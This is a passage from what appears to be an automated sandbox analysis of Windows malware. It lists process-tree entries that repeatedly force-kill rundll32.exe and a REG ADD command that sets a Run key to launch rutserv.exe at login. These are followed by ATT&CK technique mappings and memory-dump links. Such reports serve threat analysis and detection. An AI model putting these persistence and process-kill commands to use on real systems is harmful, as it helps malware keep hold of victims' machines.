      PID:392
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "rundll32.exe"
      4⤵
      PID:1312
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "rundll32.exe"
      4⤵
      Kills process with taskkill
      PID:1016
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "rundll32.exe"
      4⤵
      Kills process with taskkill
      PID:1032
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "rundll32.exe"
      4⤵
      Kills process with taskkill
      PID:1648
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "rundll32.exe"
      4⤵
      Kills process with taskkill
      PID:1336
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "rundll32.exe"
      4⤵
      Kills process with taskkill
      PID:1832
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "rundll32.exe"
      4⤵
      Kills process with taskkill
      PID:1288
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "rundll32.exe"
      4⤵
      PID:1508
  - - C:\Windows\system32\reg.exe
      REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "serv" /t REG_SZ /d "C:\ProgramData\Immunity\rutserv.exe"
      4⤵
      Adds Run key to start application
      PID:556

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/552-78-0x0000000000230000-0x0000000000231000-memory.dmp

Filesize
4KB

Download
memory/640-62-0x0000000074161000-0x0000000074163000-memory.dmp

Filesize
8KB

Download
memory/640-61-0x0000000000240000-0x0000000000241000-memory.dmp

Filesize
4KB

Download
memory/1428-55-0x0000000000400000-0x00000000004CC000-memory.dmp

Filesize
816KB

Download
memory/1428-54-0x0000000074DE1000-0x0000000074DE3000-memory.dmp

Filesize
8KB

Download
memory/1428-59-0x0000000000400000-0x00000000004CC000-memory.dmp

Filesize
816KB

Download
memory/1812-71-0x0000000000230000-0x0000000000231000-memory.dmp

Filesize
4KB

Download